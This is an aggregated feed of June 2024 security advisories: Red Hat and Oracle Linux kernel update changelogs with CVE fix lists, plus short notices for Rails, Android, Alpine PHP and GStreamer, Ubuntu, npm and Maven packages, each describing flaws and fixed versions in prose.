* kernel: USB: core: Fix deadlock in usb_deauthorize_interface() (CVE-2024-26934)
* kernel: USB: core: Fix deadlock in port "disable" sysfs attribute (CVE-2024-26933)
* kernel: fs: sysfs: Fix reference leak in sysfs_break_active_protection() (CVE-2024-26993)
* kernel: fat: fix uninitialized field in nostale filehandles (CVE-2024-26973)
* kernel: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command (CVE-2024-27059)
* kernel: net:emac/emac-mac: Fix a use after free in emac_mac_tx_buf_send (CVE-2021-47013)
* kernel: net: usb: fix memory leak in smsc75xx_bind (CVE-2021-47171)
* kernel: powerpc/pseries: Fix potential memleak in papr_get_attr() (CVE-2022-48669)
* kernel: uio: Fix use-after-free in uio_open (CVE-2023-52439)
* kernel: wifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus() (CVE-2023-52594)
* kernel: wifi: rt2x00: restart beacon queue when hardware reset (CVE-2023-52595)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3618
05.06.2024 03:00:00 | redhat | [RHSA-2024:3627] kernel-rt security and bug fix update (moderate)
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (CVE-2023-6240)
* kernel: Information disclosure in vhost/vhost.c:vhost_new_msg() (CVE-2024-0340)
* kernel: untrusted VMM can trigger int80 syscall handling (CVE-2024-25744)
* kernel: i2c: i801: Fix block process call transactions (CVE-2024-26593)
* kernel: pvrusb2: fix use after free on context disconnection (CVE-2023-52445)
* kernel: x86/fpu: Stop relying on userspace for info to fault in xsave buffer that cause loop forever (CVE-2024-26603)
* kernel: use after free in i2c (CVE-2019-25162)
* kernel: i2c: validate user data in compat ioctl (CVE-2021-46934)
* kernel: media: dvbdev: Fix memory leak in dvb_media_device_free() (CVE-2020-36777)
* kernel: usb: hub: Guard against accesses to uninitialized BOS descriptors (CVE-2023-52477)
* kernel: mtd: require write permissions for locking and badblock ioctls (CVE-2021-47055)
* kernel: net/smc: fix illegal rmb_desc access in SMC-D connection dump (CVE-2024-26615)
* kernel: vt: fix memory overlapping when deleting chars in the buffer (CVE-2022-48627)
* kernel: Integer Overflow in raid5_cache_count (CVE-2024-23307)
* kernel: media: uvcvideo: out-of-bounds read in uvc_query_v4l2_menu() (CVE-2023-52565)
* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)
* kernel: net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg (CVE-2023-52528)
* kernel: platform/x86: think-lmi: Fix reference leak (CVE-2023-52520)
* kernel: RDMA/siw: Fix connection failure handling (CVE-2023-52513)
* kernel: pid: take a reference when initializing `cad_pid` (CVE-2021-47118)
* kernel: net/sched: act_ct: fix skb leak and crash on ooo frags (CVE-2023-52610)
* kernel: netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout (CVE-2024-26643)
* kernel: netfilter: nf_tables: disallow anonymous set with timeout flag (CVE-2024-26642)
* kernel: i2c: i801: Don't generate an interrupt on bus reset (CVE-2021-47153)
* kernel: xhci: handle isoc Babble and Buffer Overrun events properly (CVE-2024-26659)
* kernel: hwmon: (coretemp) Fix out-of-bounds memory access (CVE-2024-26664)
* kernel: wifi: mac80211: fix race condition on enabling fast-xmit (CVE-2024-26779)
* kernel: RDMA/srpt: Support specifying the srpt_service_guid parameter (CVE-2024-26744)
* kernel: RDMA/qedr: Fix qedr_create_user_qp error flow (CVE-2024-26743)
* kernel: tty: tty_buffer: Fix the softlockup issue in flush_to_ldisc (CVE-2021-47185)
* kernel: do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak (CVE-2024-26901)
* kernel: RDMA/srpt: Do not register event handler until srpt device is fully setup (CVE-2024-26872)
* kernel: usb: ulpi: Fix debugfs directory leak (CVE-2024-26919)
* kernel: usb: xhci: Add error handling in xhci_map_urb_for_dma (CVE-2024-26964)
* kernel: USB: core: Fix deadlock in usb_deauthorize_interface() (CVE-2024-26934)
* kernel: USB: core: Fix deadlock in port "disable" sysfs attribute (CVE-2024-26933)
* kernel: fs: sysfs: Fix reference leak in sysfs_break_active_protection() (CVE-2024-26993)
* kernel: fat: fix uninitialized field in nostale filehandles (CVE-2024-26973)
* kernel: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command (CVE-2024-27059)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.10.z kernel (JIRA:RHEL-34640)
* kernel-rt: epoll_wait not reporting catching all events to application (JIRA:RHEL-23022)
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3627
05.06.2024 03:00:00 | oraclelinux | [ELSA-2024-3618] kernel update (moderate)
[4.18.0-553.5.1.el8_10.OL8]
- Update Oracle Linux certificates (Kevin Lyons)
- Disable signing for aarch64 (Ilya Okomin)
- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]
- Update x509.genkey [Orabug: 24817676]
- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.3
- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34750652]
- Drop not needed patch
[4.18.0-553.5.1.el8_10]
- tools/power/turbostat: Fix uncore frequency file string (David Arcari) [RHEL-29238]
- tools/power turbostat: Expand probe_intel_uncore_frequency() (David Arcari) [RHEL-29238]
- uio: Fix use-after-free in uio_open (Ricardo Robaina) [RHEL-26232] {CVE-2023-52439}
- net:emac/emac-mac: Fix a use after free in emac_mac_tx_buf_send (Ken Cox) [RHEL-27316] {CVE-2021-47013}
- keys: Fix linking a duplicate key to a keyring's assoc_array (David Howells) [RHEL-30772]
- keys: Hoist locking out of __key_link_begin() (David Howells) [RHEL-30772]
- keys: Break bits out of key_unlink() (David Howells) [RHEL-30772]
- keys: Change keyring_serialise_link_sem to a mutex (David Howells) [RHEL-30772]
- wifi: brcm80211: handle pmk_op allocation failure (Jose Ignacio Tornos Martinez) [RHEL-35150] {CVE-2024-27048}
- wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work (Jose Ignacio Tornos Martinez) [RHEL-35140] {CVE-2024-27052}
- wifi: iwlwifi: mvm: ensure offloading TID queue exists (Jose Ignacio Tornos Martinez) [RHEL-35130] {CVE-2024-27056}
- wifi: mt76: mt7921e: fix use-after-free in free_irq() (Jose Ignacio Tornos Martinez) [RHEL-34866] {CVE-2024-26892}
- wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete (Jose Ignacio Tornos Martinez) [RHEL-34189] {CVE-2024-26897}
- wifi: iwlwifi: mvm: fix a crash when we run out of stations (Jose Ignacio Tornos Martinez) [RHEL-31547] {CVE-2024-26693}
- wifi: iwlwifi: fix double-free bug (Jose Ignacio Tornos Martinez) [RHEL-31543] {CVE-2024-26694}
- wifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus() (Jose Ignacio Tornos Martinez) [RHEL-29089] {CVE-2023-52594}
- wifi: rt2x00: restart beacon queue when hardware reset (Jose Ignacio Tornos Martinez) [RHEL-29093] {CVE-2023-52595}
- wifi: iwlwifi: fix a memory corruption (Jose Ignacio Tornos Martinez) [RHEL-28903] {CVE-2024-26610}
[4.18.0-553.4.1.el8_10]
- cpuhotplug: Fix kABI breakage caused by CPUHP_AP_HYPERV_ONLINE (Vitaly Kuznetsov) [RHEL-36117]
- net/mlx5e: Prevent deadlock while disabling aRFS (Kamal Heib) [RHEL-35041] {CVE-2024-27014}
- x86/tsc: Defer marking TSC unstable to a worker (Wander Lairson Costa) [RHEL-32676]
- x86/smpboot: Make TSC synchronization function call based (Wander Lairson Costa) [RHEL-32676]
- net: usb: fix possible use-after-free in smsc75xx_bind (Jose Ignacio Tornos Martinez) [RHEL-30311] {CVE-2021-47171}
- net: usb: fix memory leak in smsc75xx_bind (Jose Ignacio Tornos Martinez) [RHEL-30311] {CVE-2021-47171}
[4.18.0-552.3.1.el8_10]
- netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout (Phil Sutter) [RHEL-30076] {CVE-2024-26643}
- netfilter: nf_tables: disallow anonymous set with timeout flag (Phil Sutter) [RHEL-30080] {CVE-2024-26642}
- selftests/bpf: Fix pyperf180 compilation failure with clang18 (Artem Savkov) [RHEL-35576]
- md/raid5: fix atomicity violation in raid5_cache_count (Nigel Croxon) [RHEL-27930] {CVE-2024-23307}
- usb: ulpi: Fix debugfs directory leak (Desnes Nunes) [RHEL-33287] {CVE-2024-26919}
- powerpc/pseries: Fix potential memleak in papr_get_attr() (Mamatha Inamdar) [RHEL-35213] {CVE-2022-48669}
- USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command (Desnes Nunes) [RHEL-35122] {CVE-2024-27059}
- NFSv4: fairly test all delegations on a SEQ4_ revocation (Benjamin Coddington) [RHEL-34912]
- USB: core: Fix deadlock in usb_deauthorize_interface() (Desnes Nunes) [RHEL-35002] {CVE-2024-26934}
- usb: xhci: Add error handling in xhci_map_urb_for_dma (Desnes Nunes) [RHEL-34958] {CVE-2024-26964}
- fs: sysfs: Fix reference leak in sysfs_break_active_protection() (Ewan D. Milne) [RHEL-35076] {CVE-2024-26993}
- xhci: handle isoc Babble and Buffer Overrun events properly (Desnes Nunes) [RHEL-31297] {CVE-2024-26659}
- xhci: process isoc TD properly when there was a transaction error mid TD. (Desnes Nunes) [RHEL-31297] {CVE-2024-26659}
- USB: core: Fix deadlock in port "disable" sysfs attribute (Desnes Nunes) [RHEL-35006] {CVE-2024-26933}
- USB: core: Add hub_get() and hub_put() routines (Desnes Nunes) [RHEL-35006] {CVE-2024-26933}
- netfilter: ipset: Missing gc cancellations fixed (Phil Sutter) [RHEL-30521]
- netfilter: ipset: fix performance regression in swap operation (Phil Sutter) [RHEL-30521]
- netfilter: ipset: Fix "INFO: rcu detected stall in hash_xxx" reports (Phil Sutter) [RHEL-30521]
- netfilter: ipset: fix race condition between swap/destroy and kernel side add/del/test (Phil Sutter) [RHEL-30521]
- x86/apic/x2apic: Fix a NULL pointer deref when handling a dying cpu (David Arcari) [RHEL-32516]
- x86/coco: Disable 32-bit emulation by default on TDX and SEV (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
- x86: Make IA32_EMULATION boot time configurable (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
- x86/entry: Make IA32 syscalls' availability depend on ia32_enabled() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
- x86/elf: Make loading of 32bit processes depend on ia32_enabled() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
- x86/entry: Rename ignore_sysret() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
- x86/cpu: Don't write CSTAR MSR on Intel CPUs (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
- x86: Introduce ia32_enabled() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}
[4.18.0-552.2.1.el8_10]
- s390/ptrace: handle setting of fpc register correctly (Tobias Huschle) [RHEL-29106] {CVE-2023-52598}
- net/smc: fix illegal rmb_desc access in SMC-D connection dump (Tobias Huschle) [RHEL-27746] {CVE-2024-26615}
- wifi: mac80211: fix race condition on enabling fast-xmit (Jose Ignacio Tornos Martinez) [RHEL-31664] {CVE-2024-26779}
- powerpc/fadump: make is_kdump_kernel() return false when fadump is active (Mamatha Inamdar) [RHEL-24401]
- vmcore: remove dependency with is_kdump_kernel() for exporting vmcore (Mamatha Inamdar) [RHEL-24401]
- mtd: require write permissions for locking and badblock ioctls (Prarit Bhargava) [RHEL-27585] {CVE-2021-47055}
- mtd: properly check all write ioctls for permissions (Prarit Bhargava) [RHEL-27585] {CVE-2021-47055}
- pid: take a reference when initializing (Waiman Long) [RHEL-29420] {CVE-2021-47118}
- i2c: i801: Don't generate an interrupt on bus reset (Prarit Bhargava) [RHEL-30325] {CVE-2021-47153}
- RDMA/srpt: Do not register event handler until srpt device is fully setup (Kamal Heib) [RHEL-33224] {CVE-2024-26872}
- ceph: switch to corrected encoding of max_xattr_size in mdsmap (Xiubo Li) [RHEL-26723]
- ceph: switch to use cap_delay_lock for the unlink delay list (Xiubo Li) [RHEL-32870]
- ceph: pass ino# instead of old_dentry if it's disconnected (Xiubo Li) [RHEL-32870]
- fat: fix uninitialized field in nostale filehandles (Andrey Albershteyn) [RHEL-33186 RHEL-35108] {CVE-2024-26973}
- do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak (Andrey Albershteyn) [RHEL-33186] {CVE-2024-26901}
- idpf: limit the support to GCP only (Michal Schmidt) [RHEL-15652]
- redhat/configs: enable CONFIG_IDPF (Michal Schmidt) [RHEL-15652]
- idpf: remove the use of ETHTOOL_RING_USE_TCP_DATA_SPLIT (Michal Schmidt) [RHEL-15652]
- idpf: workaround for unavailable skb page recycling (Michal Schmidt) [RHEL-15652]
- idpf: always allocate a full page (Michal Schmidt) [RHEL-15652]
- idpf: remove page pool stats code (Michal Schmidt) [RHEL-15652]
- idpf: add minimal macros for __free(kfree) to work (Michal Schmidt) [RHEL-15652]
- idpf: fixup include paths for RHEL 8 (Michal Schmidt) [RHEL-15652]
- idpf: fix kernel panic on unknown packet types (Michal Schmidt) [RHEL-15652]
- idpf: disable local BH when scheduling napi for marker packets (Michal Schmidt) [RHEL-15652]
- idpf: remove dealloc vector msg err in idpf_intr_rel (Michal Schmidt) [RHEL-15652]
- idpf: fix minor controlq issues (Michal Schmidt) [RHEL-15652]
- idpf: prevent deinit uninitialized virtchnl core (Michal Schmidt) [RHEL-15652]
- idpf: cleanup virtchnl cruft (Michal Schmidt) [RHEL-15652]
- idpf: refactor idpf_recv_mb_msg (Michal Schmidt) [RHEL-15652]
- idpf: add async_handler for MAC filter messages (Michal Schmidt) [RHEL-15652]
- idpf: refactor remaining virtchnl messages (Michal Schmidt) [RHEL-15652]
- idpf: refactor queue related virtchnl messages (Michal Schmidt) [RHEL-15652]
- idpf: refactor vport virtchnl messages (Michal Schmidt) [RHEL-15652]
- idpf: implement virtchnl transaction manager (Michal Schmidt) [RHEL-15652]
- idpf: add idpf_virtchnl.h (Michal Schmidt) [RHEL-15652]
- idpf: avoid compiler padding in virtchnl2_ptype struct (Michal Schmidt) [RHEL-15652]
- idpf: distinguish vports by the dev_port attribute (Michal Schmidt) [RHEL-15652]
- idpf: avoid compiler introduced padding in virtchnl2_rss_key struct (Michal Schmidt) [RHEL-15652]
- idpf: fix corrupted frames and skb leaks in singleq mode (Michal Schmidt) [RHEL-15652]
- idpf: refactor some missing field get/prep conversions (Michal Schmidt) [RHEL-15652]
- idpf: add get/set for Ethtool's header split ringparam (Michal Schmidt) [RHEL-15652]
- idpf: fix potential use-after-free in idpf_tso() (Michal Schmidt) [RHEL-15652]
- idpf: cancel mailbox work in error path (Michal Schmidt) [RHEL-15652]
- idpf: set scheduling mode for completion queue (Michal Schmidt) [RHEL-15652]
- idpf: add SRIOV support and other ndo_ops (Michal Schmidt) [RHEL-15652]
- idpf: add ethtool callbacks (Michal Schmidt) [RHEL-15652]
- idpf: add singleq start_xmit and napi poll (Michal Schmidt) [RHEL-15652]
- idpf: add RX splitq napi poll support (Michal Schmidt) [RHEL-15652]
- idpf: add TX splitq napi poll support (Michal Schmidt) [RHEL-15652]
- idpf: add splitq start_xmit (Michal Schmidt) [RHEL-15652]
- idpf: initialize interrupts and enable vport (Michal Schmidt) [RHEL-15652]
- idpf: configure resources for RX queues (Michal Schmidt) [RHEL-15652]
- idpf: configure resources for TX queues (Michal Schmidt) [RHEL-15652]
- idpf: add ptypes and MAC filter support (Michal Schmidt) [RHEL-15652]
- idpf: add create vport and netdev configuration (Michal Schmidt) [RHEL-15652]
- idpf: add core init and interrupt request (Michal Schmidt) [RHEL-15652]
- idpf: add controlq init and reset checks (Michal Schmidt) [RHEL-15652]
- idpf: add module register and probe functionality (Michal Schmidt) [RHEL-15652]
- virtchnl: add virtchnl version 2 ops (Michal Schmidt) [RHEL-15652]
- net: netdev_queue: netdev_txq_completed_mb(): fix wake condition (Michal Schmidt) [RHEL-15652]
- net: piggy back on the memory barrier in bql when waking queues (Michal Schmidt) [RHEL-15652]
- net: provide macros for commonly copied lockless queue stop/wake code (Michal Schmidt) [RHEL-15652]
[4.18.0-552.1.1.el8_10]
- redhat: set DIST to el8_10 and ZSTREAM to yes for 8.10 (Denys Vlasenko)
- tty: tty_buffer: Fix the softlockup issue in flush_to_ldisc (Prarit Bhargava) [RHEL-32590] {CVE-2021-47185}
- net: mana: Fix Rx DMA datasize and skb_over_panic (Cathy Avery) [RHEL-32579]
- RDMA/srpt: Support specifying the srpt_service_guid parameter (Kamal Heib) [RHEL-31710] {CVE-2024-26744}
- RDMA/qedr: Fix qedr_create_user_qp error flow (Kamal Heib) [RHEL-31714] {CVE-2024-26743}
- hwmon: (coretemp) Fix out-of-bounds memory access (David Arcari) [RHEL-31305] {CVE-2024-26664}
- RDMA/irdma: Fix KASAN issue with tasklet (Kamal Heib) [RHEL-15776]
- net: bridge: use DEV_STATS_INC() (Ivan Vecera) [RHEL-27989] {CVE-2023-52578}
- net: Fix unwanted sign extension in netdev_stats_to_stats64() (Ivan Vecera) [RHEL-27989] {CVE-2023-52578}
- net: add atomic_long_t to net_device_stats fields (Ivan Vecera) [RHEL-27989] {CVE-2023-52578}
- net/sched: act_ct: fix skb leak and crash on ooo frags (Xin Long) [RHEL-29467] {CVE-2023-52610}
- net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg (Jose Ignacio Tornos Martinez) [RHEL-28015] {CVE-2023-52528}
- RDMA/core: Fix uninit-value access in ib_get_eth_speed() (Kamal Heib) [RHEL-30130]
- RDMA/core: Get IB width and speed from netdev (Kamal Heib) [RHEL-30130]
- cpufreq: intel_pstate: Add Emerald Rapids support in no-HWP mode (Prarit Bhargava) [RHEL-29444]
- powerpc/mm: Fix null-pointer dereference in pgtable_cache_add (Mamatha Inamdar) [RHEL-29118] {CVE-2023-52607}
- powerpc/lib: Validate size for vector operations (Mamatha Inamdar) [RHEL-29114] {CVE-2023-52606}
- usb: hub: Guard against accesses to uninitialized BOS descriptors (Desnes Nunes) [RHEL-28986] {CVE-2023-52477}
- media: uvcvideo: Fix OOB read (Desnes Nunes) [RHEL-27940] {CVE-2023-52565}
- media: pvrusb2: fix use after free on context disconnection (Desnes Nunes) [RHEL-26498] {CVE-2023-52445}
- i2c: i801: Fix block process call transactions (Prarit Bhargava) [RHEL-26478] {CVE-2024-26593}
- overlay: disable EVM (Coiby Xu) [RHEL-19863]
- evm: add support to disable EVM on unsupported filesystems (Coiby Xu) [RHEL-19863]
- evm: don't copy up 'security.evm' xattr (Coiby Xu) [RHEL-19863]
- net: ena: Remove ena_select_queue (Kamal Heib) [RHEL-14286]
- media: dvbdev: Fix memory leak in dvb_media_device_free() (Prarit Bhargava) [RHEL-27254] {CVE-2020-36777}
- gfs2: Fix invalid metadata access in punch_hole (Andrew Price) [RHEL-28784]
- i2c: Fix a potential use after free (Prarit Bhargava) [RHEL-26849] {CVE-2019-25162}
- i2c: validate user data in compat ioctl (Prarit Bhargava) [RHEL-27022] {CVE-2021-46934}
- platform/x86: think-lmi: Fix reference leak (Prarit Bhargava) [RHEL-28030] {CVE-2023-52520}
- vhost: use kzalloc() instead of kmalloc() followed by memset() (Jon Maloy) [RHEL-21505] {CVE-2024-0340}
- RDMA/siw: Fix connection failure handling (Kamal Heib) [RHEL-28042] {CVE-2023-52513}
- vt: fix memory overlapping when deleting chars in the buffer (Waiman Long) [RHEL-27778 RHEL-27779] {CVE-2022-48627}
- x86/fpu: Stop relying on userspace for info to fault in xsave buffer (Steve Best) [RHEL-26669] {CVE-2024-26603}
- mptcp: fix double-free on socket dismantle (Davide Caratti) [RHEL-22773] {CVE-2024-26782}
- crypto: akcipher - Disable signing and decryption (Herbert Xu) [RHEL-17114] {CVE-2023-6240}
- crypto: akcipher - default implementations for request callbacks (Herbert Xu) [RHEL-17114] {CVE-2023-6240}
- crypto: testmgr - split akcipher tests by a key type (Herbert Xu) [RHEL-17114] {CVE-2023-6240}
- workqueue: Warn when a rescuer could not be created (Waiman Long) [RHEL-22136]
- RDMA/cma: Avoid GID lookups on iWARP devices (Benjamin Coddington) [RHEL-12456]
- RDMA/cma: Deduplicate error flow in cma_validate_port() (Benjamin Coddington) [RHEL-12456]
- RDMA/core: Set gid_attr.ndev for iWARP devices (Benjamin Coddington) [RHEL-12456]
- RDMA/siw: Fabricate a GID on tun and loopback devices (Benjamin Coddington) [RHEL-12456]
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3618
05.06.2024 18:30:46 | go | [GO-2024-2732] Evmos vulnerable to DOS and transaction fee expropriation through Authz exploit in github.com/evmos/evmos/v11
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2732
05.06.2024 15:10:07 | rubysec | [RUBYSEC:ACTIONPACK-2024-28103] Missing security headers in Action Pack on non-HTML responses (medium)
Permissions-Policy is Only Served on HTML Content-Type

The application configurable Permissions-Policy is only served on responses with an HTML related Content-Type.

This has been assigned the CVE identifier CVE-2024-28103.

Versions Affected: >= 6.1.0
Not affected: < 6.1.0
Fixed Versions: 6.1.7.8, 7.0.8.4, and 7.1.3.4

Impact
------
Responses with a non-HTML Content-Type are not serving the configured Permissions-Policy. There are certain non-HTML Content-Types that would benefit from having the Permissions-Policy enforced.

Releases
--------
The fixed releases are available at the normal locations.

Workarounds
-----------
N/A

Patches
-------
To aid users who aren't able to upgrade immediately we have provided patches for the supported release series in accordance with our [maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues) regarding security issues. They are in git-am format and consist of a single changeset.

* 6-1-include-permissions-policy-header-on-non-html.patch - Patch for 6.1 series
* 7-0-include-permissions-policy-header-on-non-html.patch - Patch for 7.0 series
* 7-1-include-permissions-policy-header-on-non-html.patch - Patch for 7.1 series

Credits
-------
Thank you [shinkbr](https://hackerone.com/shinkbr) for reporting this!
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-28103
05.06.2024 15:10:07 | rubysec | [RUBYSEC:ACTIONTEXT-2024-32464] ActionText ContentAttachment can Contain Unsanitized HTML (medium)
Instances of ActionText::Attachable::ContentAttachment included within a rich_text_area tag could potentially contain unsanitized HTML.

This has been assigned the CVE identifier CVE-2024-32464.

Versions Affected: >= 7.1.0
Not affected: < 7.1.0
Fixed Versions: 7.1.3.4

Impact
------
This could lead to a potential cross site scripting issue within the Trix editor.

Releases
--------
The fixed releases are available at the normal locations.

Workarounds
-----------
N/A

Patches
-------
To aid users who aren't able to upgrade immediately we have provided patches for the supported release series in accordance with our [maintenance policy](https://guides.rubyonrails.org/maintenance_policy.html#security-issues) regarding security issues. They are in git-am format and consist of a single changeset.

* action_text_content_attachment_xss_7_1_stable.patch - Patch for 7.1 series

Credits
-------
Thank you [ooooooo_q](https://hackerone.com/ooooooo_q) for reporting this!
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONTEXT-2024-32464
06.06.2024 17:40:16 | android | [ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)
In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
Link: https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078

08.06.2024 02:15:47 | alpinelinux | [ALPINE:CVE-2024-0444] gst-plugins-bad vulnerability (high)
[From CVE-2024-0444] GStreamer AV1 Video Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the parsing of tile list data within AV1-encoded video files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22873.
Link: https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-0444

08.06.2024 01:51:46 | ubuntu | [USN-6821-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-1

08.06.2024 01:40:36 | ubuntu | [USN-6820-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6820-1

07.06.2024 23:33:17 | ubuntu | [USN-6819-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6819-1

07.06.2024 23:18:53 | ubuntu | [USN-6818-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-1

07.06.2024 21:49:30 | ubuntu | [USN-6817-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-1

07.06.2024 21:18:31 | ubuntu | [USN-6816-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6816-1

07.06.2024 22:36:28 | maven | [MAVEN:GHSA-92WP-JGHR-HH87] Weak encryption in Ninja Core (moderate)
The encrypt() function of Ninja Core v7.0.0 was discovered to use a weak cryptographic algorithm, leading to a possible leakage of sensitive information.
Link: https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-92WP-JGHR-HH87

07.06.2024 17:40:43 | android | [ASB-A-223376078] [There are two problems with killBackgroundProcesses in ActivityManager] (high)
In multiple functions of ActivityManagerService.java, there is a possible way to escape Google Play protection due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
Link: https://secdb.nttzen.cloud/security-advisory/android/ASB-A-223376078
09.06.2024 23:15:09 | alpinelinux | [ALPINE:CVE-2024-4577] php82, php81, php83 vulnerability (critical)
[From CVE-2024-4577] In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Link: https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-4577

09.06.2024 22:15:52 | alpinelinux | [ALPINE:CVE-2024-5458] php83, php81, php82 vulnerability (medium)
[From CVE-2024-5458] In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, due to a code logic error, filtering functions such as filter_var when validating URLs (FILTER_VALIDATE_URL) for certain types of URLs the function will result in invalid user information (username + password part of URLs) being treated as valid user information. This may lead to the downstream code accepting invalid URLs as valid and parsing them incorrectly.
Link: https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-5458

09.06.2024 22:15:52 | alpinelinux | [ALPINE:CVE-2024-5585] php82, php81, php83 vulnerability (high)
[From CVE-2024-5585] In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, the fix for CVE-2024-1874 does not work if the command name includes trailing spaces. Original issue: when using XXXXXXXXX() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.
Link: https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-5585

11.06.2024 00:38:07 | npm | [NPM:GHSA-7V5V-9H63-CJ86] @grpc/grpc-js can allocate memory for incoming messages well above configured limits (moderate)
### Impact
There are two separate code paths in which memory can be allocated per message in excess of the `grpc.max_receive_message_length` channel option:
1. If an incoming message has a size on the wire greater than the configured limit, the entire message is buffered before it is discarded.
2. If an incoming message has a size within the limit on the wire but decompresses to a size greater than the limit, the entire message is decompressed into memory, and on the server is not discarded.
### Patches
This has been patched in versions 1.10.9, 1.9.15, and 1.8.22
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7V5V-9H63-CJ86

11.06.2024 00:36:49 | npm | [NPM:GHSA-VVHJ-V88F-5GXR] ghtml Cross-Site Scripting (XSS) vulnerability (high)
## Summary
It is possible to introduce user-controlled JavaScript code and trigger a Cross-Site Scripting (XSS) vulnerability in some cases.
## Actions Taken
- Updated the documentation to clarify that while `ghtml` escapes characters with special meaning in HTML, it does not provide comprehensive protection against all types of XSS attacks in every scenario. **_This aligns with the approach taken by other template engines. Developers should be cautious and take additional measures to sanitize user input and prevent potential vulnerabilities._** More reading: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
- The backtick character (`) is now also escaped to prevent the creation of strings in most cases where a malicious actor somehow gains the ability to write JavaScript. This does not provide comprehensive protection either.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VVHJ-V88F-5GXR
10.06.2024 23:41:56 | ubuntu | [USN-6825-1] ADOdb vulnerabilities (critical)
Several security issues were fixed in ADOdb.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6825-1

10.06.2024 22:28:08 | ubuntu | [USN-6817-2] Linux kernel (OEM) vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
Link: https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-2

10.06.2024 21:36:57 | maven | [MAVEN:GHSA-69FP-7C8P-CRJR] Keycloak exposes sensitive information in Pushed Authorization Requests (PAR) (high)
